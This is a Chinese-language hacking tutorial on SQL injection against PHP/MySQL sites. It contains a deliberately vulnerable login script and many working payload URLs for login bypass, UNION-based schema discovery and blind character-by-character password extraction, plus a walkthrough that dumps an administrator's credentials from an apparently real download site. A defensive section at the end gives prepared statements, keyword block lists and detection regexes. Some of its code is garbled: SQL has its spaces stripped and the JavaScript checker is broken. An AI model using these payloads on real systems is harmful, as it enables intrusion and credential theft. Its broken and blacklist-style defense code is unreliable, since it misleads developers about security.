"菜鸟黑客"必学攻击之"SQL注入攻击"

从2003年开始，喜欢用脚本攻击的人越来越多，而"SQL注入攻击"就成为了比较常见的网络攻击方式之一，它不是利用操作系统的BUG来实现攻击，而是针对程序员编程时的疏忽，通过SQL语句，实现无帐号登录，甚至篡改数据库。

一、SQL注入攻击的原理

SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序，而这些输入大都是SQL语法里的一些组合，通过执行SQL语句进而执行攻击者所要的操作，其主要原因是程序没有细致地过滤用户输入的数据，致使非法数据侵入系统。根据相关技术原理，SQL注入可以分为平台层注入和代码层注入。前者由不安全的数据库配置或数据库平台的漏洞所致；后者主要是由于程序员对输入未进行细致地过滤，从而执行了非法的数据查询。基于此，SQL注入的产生原因通常表现在以下几方面：①不当的类型处理；②不安全的库配置；③不合理的查询集处理；④不当的错误处理；⑤转义字符处理不合适；⑥多个提交处理不当

二、SQL注入攻击的总体思路

1.寻找到SQL注入的位置

2.判断服务器类型和后台数据库类型

3.针对不通的服务器和数据库特点进行SQL注入攻击

三、常用SQL注入工具

关于SQL注入，目前已经有工具软件支持，如WebCruiser - Web Vulnerability Scanner （Web安全漏洞扫描工具，可以扫描出网站存在SQL注入、跨站脚本攻击、XPath注入的页面，并且可以进一步进行SQL注入验证、跨站攻击验证、XPath注入验证 ），这个工具在很多网站上都有详细使用方法，在这里我不多做说明。

四、今天讲一讲"PHP+MYSQL注入"

1、通过一个例子，了解PHP下的注入的特殊性和原理。

我们拿一个用户验证的例子，首先建立一个数据库和一个数据表并插入一条记录，如下：

CREATETABLE`user`(

`userid`int(11)NOTNULLauto_increment,

`username`varchar(20)NOTNULLdefault'',

`password`varchar(20)NOTNULLdefault'',

PRIMARYKEY(`userid`)

)TYPE=MyISAMAUTO_INCREMENT=3;

#

#导出表中的数据`user`

#

INSERTINTO`user`VALUES(1,'angel','mypass');

验证用户文件的代码如下：

<?php

$servername="localhost";

$dbusername="root";

$dbpassword="";

$dbname="injection";

mysql_connect($servername,$dbusername,$dbpassword)ordie("数据库连接失败");

$sql="SELECT*FROMuserWHEREusername='$username'ANDpassword='$password'";

$result=mysql_db_query($dbname,$sql);

$userinfo=mysql_fetch_array($result);

if(empty($userinfo))

{

echo"登陆失败";

}else{

echo"登陆成功";

}

echo"

SQLQuerysql

";

?>

这时我们提交：

http://127.0.0.1/injection/user.php?username=angel'or1=1

就会返回：

Warning:mysql_fetch_array():suppliedargumentisnotavalidMySQLresultresource

inF:wwwinjectionuser.phponline13

登陆失败

SQLQuery:SELECT*FROMuserWHEREusername='angel'or1=1'ANDpassword=''PHPWarning:mysql_fetch_array():suppliedargumentisnotavalidMySQLresult

resourceinF:wwwinjectionuser.phponline13

看到了吗？单引号闭合后，并没有注释掉后面的单引号，导致单引号没有正确配对，所以由此可知我们构造的语句不能让Mysql正确执行，要重新构造：

http://127.0.0.1/injection/user.php?username=angel'or'1=1

这时显示"登陆成功"，说明成功了。或者提交：

http://127.0.0.1/injection/user.php?username=angel'/*

http://127.0.0.1/injection/user.php?username=angel'%23

这样就把后面的语句给注释掉了！说说这两种提交的不同之处，我们提交的第一句是利用逻辑运算，在ASP中运用可以说是非常广泛的，这个不用说了吧？第二、三句是根据mysql的特性，mysql支持/*和#两种注释格式，所以我们提交的时候是把后面的代码注释掉，值得注意的是由于编码问题，在IE地址栏里提交#会变成空的，所以我们在地址栏提交的时候，应该提交%23，才会变成#，就成功注释了，这个比逻辑运算简单得多了，由此可以看出PHP比ASP强大灵活多了。通过上面的例子大家应该对PHP+MYSQL的注入有个基础的认识了吧？

2、注入的高级应用

2.1 使用MYSQL内置函数

我们在ACCESS、MSSQL中的注入，有很多比较高级的注入方法，比如深入到系统，猜中文等，这些东西，在MYSQL也能很好得到发挥，其实在MYSQL有很多内置函数都可以用在SQL语句里，这样就可以使我们能在注入时更灵活，得到更多关于系统的信息。有几个函数是比较常用的：

DATABASE()

USER()

SYSTEM_USER()

SESSION_USER()

CURRENT_USER()

……

各个函数的具体作用大家可以查阅MYSQL手册，比如下面这句UPDATE：

UPDATE article SET title=$title WHERE articleid=1

我们可以指定$title为以上的各个函数，因为没有被引号包含，所以函数是能正确执行的：

UPDATE article SET title=DATABASE() WHERE id=1

#把当前数据库名更新到title字段

UPDATE article SET title=USER() WHERE id=1

#把当前 MySQL 用户名更新到title字段

UPDATE article SET title=SYSTEM_USER() WHERE id=1

#把当前 MySQL 用户名更新到title字段

UPDATE article SET title=SESSION_USER() WHERE id=1

#把当前 MySQL 用户名更新到title字段

UPDATE article SET title=CURRENT_USER() WHERE id=1

#把当前会话被验证匹配的用户名更新到title字段

灵活运用MYSQL内置的函数，可以获得不少有用的信息，比如数据库版本、名字、用户、当前数据库等，比如前面跨表查询的例子，提交：

http://127.0.0.1/injection/show.php?id=1

可以看到一篇文章，我们怎么样才能知道MYSQL数据库的相关信息呢？同样也是用MYSQL内置函数配合UNION联合查询，不过相比之下就简单得多了，甚至还可以读取文件！既然要用到UNION，同样要满足UNION的条件--字段数、数据类型相同。如果我们知道了数据结构，直接构造：

http://127.0.0.1/injection/show.php?id=-1 union select 1,database(),version()

就可以返回当前数据库名和数据库版本，构造是比较容易的。

下面附上一段代码，可以把字符串转换为ASCII代码。#!/usr/bin/perl

#cody by Super·Hei

#to angel

#C:>test.pl c:boot.ini

#99,58,92,98,111,111,116,46,105,110,105

$ARGC = @ARGV;

if ($ARGC != 1) {

print "Usage: $0 n";

exit(1);

}

$path=shift;

@char = unpack('C*', $path);

$asc=join(",",@char);

print $asc;

2.2不加单引号注入

注：现在我们假设magic_quotes_gpc为on了。

众所周知，整形的数据是不需要用引号引起来的，而字符串就要用引号，这样可以避免很多问题。但是如果仅仅用整形数据，我们是没有办法注入的，所以我需要把我们构造的语句转换成整形类型，这个就需要用到CHAR()，ASCII(),ORD(),CONV()这些函数了，举个简单的例子：

SELECT * FROM user WHERE username='angel'

如何使$username不带引号呢？很简单我们这样提交就可以了。

SELECT * FROM user WHERE user name=char(97,110,103,101,108)

# char(97,110,103,101,108) 相当于angel，十进制。

SELECT * FROM user WHERE username=0x616E67656C

# 0x616E67656C 相当于angel，十六进制。

其他函数大家自己去测试好了，但是前提就如上面所说的，我们可以构造的变量不被引号所包含才有意义，不然我们不管构造什么，只是字符串，发挥不了作用，比如前面猜密码的例子(user,php)，我们把查询条件改为userid：

SELECT * FROM user WHERE userid=userid

按照正常的，提交：

http://127.0.0.1/injection/user.php?userid=1

就可以查询userid为1的用户资料，因为1是数字，所以有没有引号都无所谓，但是如果我们构造：

http://127.0.0.1/injection/user.php?userid=1 and password=mypass

绝对错误，因为mypass是字符串，除非提交：

http://127.0.0.1/injection/user.php?userid=1 and password='mypass'

由于magic_quotes_gpc打开的关系，这个是绝对不可能的。引号会变成/'，我们有什么办法可以把这些字符串变成整形数据吗？就是用CHAR()函数，如果我们提交：

http://127.0.0.1/injection/user.php?userid=1 and password=char

(109,121,112,97,115,115)

正常返回，实践证明，我们用CHAR()是可行的，我们就把CHAR()用进LEFT函数里面逐位猜解！

http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,1)=char(109)

正常返回，说明userid为1的用户，password字段第一位是char(109)，我们继续猜：

http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,2)=char(109,121)

又正常返回，说明正确，但这样影响到效率，既然是整形，我们完全可以用比较运算符来比较：

http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,1)>char(100)

然后适当调整char()里面的数字来确定一个范围，很快就可以猜出来，到了后面的时候，还是可以用比较运算符来比较：

http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,3)>char(109,121,111)

而原来已经猜好的不用改变了，很快就可以猜完：

http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,6)=char

(109,121,112,97,115,115)

然后在mysql>命令提示符下或者在phpMyadmin里面执行：

select char(109,121,112,97,115,115)

就会返回：mypass

当然也可以使用SUBSTRING(str,pos,len)和MID(str,pos,len)函数，从字符串 str 的 pos 位置起返回 len 个字符的子串。这个和ACCESS是一样的。还是刚才的例子，我们猜password字段的第三位、第四位试试，第三位是p，第四位是a，我们这样构造：

http://127.0.0.1/injection/user.php?userid=1 and mid(password,3,1)=char(112)

http://127.0.0.1/injection/user.php?userid=1 and mid(password,4,1)=char(97)

我们要的结果就迸出来了。当然，如果觉得麻烦，还可以用更简单的办法，就是利用ord()函数，具体作用可以去查看MYSQL参考手册，该函数返回的是整形类型的数据，可以用比较运算符进行比较、当然得出的结果也就快多了，也就是这样提交：

http://127.0.0.1/injection/user.php?userid=1 and ord(mid(password,3,1))>111

http://127.0.0.1/injection/user.php?userid=1 and ord(mid(password,3,1))<113

http://127.0.0.1/injection/user.php?userid=1 and ord(mid(password,3,1))=112

这样我们就得出结果了，然后我们再用char()函数还原出来就好了。至于其他更多函数，大家可以自己去试验，限于篇幅也不多说了。

2.3快速确定未知数据结构的字段及类型

如果不清楚数据结构，很难用UNION联合查询，这里我告诉大家一个小技巧，也是非常有用非常必要的技巧，充分发挥UNION的特性。

还是拿前面的show.php文件做例子，当我们看到形如xxx.php?id=xxx的URL的时候，如果要UNION，就要知道这个xxx.php查询的数据表的结构，我们可以这样提交来快速确定有多少个字段：

http://127.0.0.1/injection/show.php?id=-1 union select 1,1,1

有多少个"1"就表示有多少个字段，可以慢慢试，如果字段数不相同，就肯定会出错，如果字段数猜对了，就肯定会返回正确的页面，字段数出来了，就开始判断数据类型，其实也很容易，随便用几个字母代替上面的1，但是由于magic_quotes_gpc打开，我们不能用引号，老办法，还是用char()函数，char(97)表示字母"a"，如下：

http://127.0.0.1/injection/show.php?id=-1 union select char(97),char(97),char(97)

如果是字符串，那就会正常显示"a"，如果不是字符串或文本，也就是说是整形或布尔形，就会返回"0"

判断最主要靠什么？经验，我以前一直都说，经验很重要，丰富经验能更好的作出正确的判断，因为程序的代码是千变万化的，我们这里是只是举个最简单的例子，这里由于局限性，程序都是自己写、自己测试的。方法因程序而异。希望大家在实战中，注意区别，不要照搬，灵活运用才是根本。

2.4猜数据表名

在快速确定未知数据结构的字段及类型的基础上，我们又可以进一步的分析整个数据结构，那就是猜表名，其实使用UNION联合查询的时候，不管后面的查询怎么"畸形"，只要没有语句上的问题，都会正确返回，也就是说，我们可以在上面的基础上，进一步猜到表名了，比如刚才我们提交：

http://127.0.0.1/injection/show.php?id=1 union select 1,1,1

返回正常的内容，就说明这个文件查询的表内是存在3个字段的，然后我们在后面加入from table_name，也就是这样：

http://127.0.0.1/injection/show.php?id=1 union select 1,1,1 from members

http://127.0.0.1/injection/show.php?id=1 union select 1,1,1 from admin

http://127.0.0.1/injection/show.php?id=1 union select 1,1,1 from user

如果这个表是存在的，那么同样会返回应该显示的内容，如果表不存在，当然就会出错了，所以我的思路是先获得有漏洞的文件所查询表的数据结构，确定结果后再进一步查询表，这个手工操作是没有效率的问题的，不到一分钟就可以查询到了，比如我们在测试www.***bai.net就是这样，后面的实例会涉及到。

但是有一个问题，由于很多情况下，很多程序的数据表都会有一个前缀，有这个前缀就可以让多个程序共用一个数据库。比如：

site_article

site_user

site_download

forum_user

forum_post

……

如果安全意识高的话，管理员会加个表名前缀，那猜解就很麻烦了，不过完全可以做一个表名列表来跑。这里就不多说了，接下来举一个实际例子。

3、测试实例

以下实例内容只是为了验证上述讲解内容，针对一个测试站点进行善意的攻击测试，我们称这个测试站点为HB(www.***bai.net)，该站点是文章系统和下载系统，首先需要利用技术渗透HB，这点我之前的文章有说过找到漏洞是攻击的前提。

首先我们找到有问题的文件，show.php?id=1，我们马上看看数据结构和表名，看看HB有没有改字段和表名，发现该站点下载系统1.0.1版的软件信息的表有19个字段，就提交：

http://127.0.0.1/ymdown/show.php?id=1 union select

1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1

注意，这里有19个"1"，返回正常的页面，我可以可以肯定字段没有变，我们也就别拖拉了，直接看看它的默认用户数据表是否存在：

http://127.0.0.1/ymdown/show.php?id=1 union select

1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user

再看默认的用户id还在不在？

http://127.0.0.1/ymdown/show.php?id=1 union select

1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1

我们要注意一点，show.php文件里面有这样一段代码：

if ($id > "0" && $id < "999999999" ):

//这里是正确执行的代码

else:

echo "

<center><a href=./list.php>无记录</a>n";

也就是说我们的ID的值再怎么离谱也不能在0和999999999之外，HB的软件肯定不会超过10000个的，我们就提交：

http://127.0.0.1/ymdown/show.php?id=10000 union select

1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1

正常返回了，表格里的数据全部是"1"，说明ID还在哦。如果不存在的话，页面只返回的数据全部是不详，因为程序的判断是如果数据为空就显示不详。现在确定了ID存在后，还要确定是不是管理员才行啊：

http://127.0.0.1/ymdown/show.php?id=10000 union select

1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and groupid=1

程序规定groupid为1是超级管理员，既然都返回正确信息了，我们就直接构造畸形语句，暴出我们需要的用户名和密码，嘿嘿，首先看看ymdown表的数据结构，因为show.php是查询它的，所以我们应该看它的数据结构。

CREATE TABLE ymdown (

id int(10) unsigned NOT NULL auto_increment,

name varchar(100) NOT NULL,

updatetime varchar(20) NOT NULL,

size varchar(100) NOT NULL,

empower varchar(100) NOT NULL,

os varchar(100) NOT NULL,

grade smallint(6) DEFAULT '0' NOT NULL,

viewnum int(10) DEFAULT '0' NOT NULL,

downnum int(10) DEFAULT '0' NOT NULL,

homepage varchar(100), demo varchar(100),

brief mediumtext, img varchar(100),

sort2id smallint(6) DEFAULT '0' NOT NULL,

down1 varchar(100) NOT NULL,

down2 varchar(100),

down3 varchar(100),

down4 varchar(100),

down5 varchar(100),

PRIMARY KEY (id)

);

用户名和密码的数据类型都是varchar，所以我们要选择ymdown表里数据类型是varchar来，如果把varchar的数据写到int的地方当然是不可能显示的了，由于updatetime（更新日期）的长度是20，可能会出现显示不完全的情况，我们就把用户名显示在name（软件标题）那里，密码显示在size（文件大小）那里好了，在19个"1"中，name和size分别是第二个和第四个，我们提交：

http://127.0.0.1/ymdown/show.php?id=10000 union select

1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1

结果成功返回了我们所需要的用户名和密码验证测试结果

整个渗透过程就结束了，不过由于黑白把入口给改了，无法登陆，但我们仅仅测试注入，目的已经达到了，就没有必要进后台了，我后来又继续构造SQL语句来验证我们获取的密码是否正确，依次提交：

http://127.0.0.1/ymdown/show.php?id=10 union select

1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49

#验证第一位密码

http://127.0.0.1/ymdown/show.php?id=10 union select

1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,2,1))=50

#验证第二位密码

http://127.0.0.1/ymdown/show.php?id=10 union select

1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,3,1))=51

#验证第三位密码

http://127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,4,1))=52

#验证第四位密码

http://127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,5,1))=53

#验证第五位密码

http://127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,6,1))=54

#验证第六位密码

用select char(49,50,51,52,53,54)就可以得到123456。

OK！测试结束，验证我们的结果没有错误。说明一下，密码本身是123456，可以不用ord()函数而直接猜，但为了大家能看到一个完整的过程，还是"专业"一点好了。

五、SQL注入如何防范？

1、（简单又有效的方法）PreparedStatement

采用预编译语句集，它内置了处理SQL注入的能力，只要使用它的setXXX方法传值即可。使用好处：

(1).代码的可读性和可维护性.

(2).PreparedStatement尽最大可能提高性能.

(3).最重要的一点是极大地提高了安全性.

原理：

sql注入只对sql语句的准备(编译)过程有破坏作用

而PreparedStatement已经准备好了,执行阶段只是把输入串作为数据处理,

而不再对sql语句进行解析,准备,因此也就避免了sql注入问题.

2、字符串过滤

比较通用的一个方法：

（||之间的参数可以根据自己程序的需要添加）

public static boolean sql_inj(String str)

{

String inj_str = "'|and|exec|insert|select|delete|update|

count|*|%|chr|mid|master|truncate|char|declare|;|or|-|+|,";

String inj_stra[] = split(inj_str,"|");

for (int i=0 ; i < inj_stra.length ; i++ )

{

if (str.indexOf(inj_stra[i])>=0)

{

return true;

}

}

return false;

}

3、使用正则表达式过滤传入的参数

要引入的包：

import java.util.regex.*;

正则表达式：

private String CHECKSQL = "^(.+)\\sand\\s(.+)|(.+)\\sor(.+)\\s$";

判断是否匹配：

Pattern.matches(CHECKSQL,targerStr);

下面是具体的正则表达式：

检测SQL meta-characters的正则表达式 ：

/(\%27)|(\')|(\-\-)|(\%23)|(#)/ix

修正检测SQL meta-characters的正则表达式 ：/((\%3D)|(=))[^\n]*((\%27)|(\')|(\-\-)|(\%3B)|(:))/i

典型的SQL 注入攻击的正则表达式 ：/\w*((\%27)|(\'))((\%6F)|o|(\%4F))((\%72)|r|(\%52))/ix

检测SQL注入，UNION查询关键字的正则表达式 ：/((\%27)|(\'))union/ix(\%27)|(\')

检测MS SQL Server SQL注入攻击的正则表达式：

/exec(\s|\+)+(s|x)p\w+/ix

4、JSP页面判断代码：

使用javascript在客户端进行不安全字符屏蔽

功能介绍：检查是否含有"'","\\","/"

参数说明：要检查的字符串

返回值：0：是1：不是

函数名是

function check(a)

{

return 1;

fibdn = new Array ("'" ,"\\","/");

i=fibdn.length;

j=a.length;

for (ii=0; ii＜i; ii++)

{ for (jj=0; jj＜j; jj++)

{ temp1=a.charAt(jj);

temp2=fibdn[ii];

if (tem'; p1==temp2)

{ return 0; }

}

}

return 1;

}

5、jsp中调用该函数检查是否包函非法字符

防止SQL从URL注入：

sql_inj.java代码：

package sql_inj;

import java.net.*;

import java.io.*;

import java.sql.*;

import java.text.*;

import java.lang.String;

public class sql_inj{

public static boolean sql_inj(String str)

{

String inj_str = "'|and|exec|insert|select|delete|update|

count|*|%|chr|mid|master|truncate|char|declare|;|or|-|+|,";

//这里的东西还可以自己添加

String[] inj_stra=inj_str.split("\\|");

for (int i=0 ; i < inj_stra.length ; i++ )

{

if (str.indexOf(inj_stra[i])>=0)

{

return true;

}

}

return false;

}

}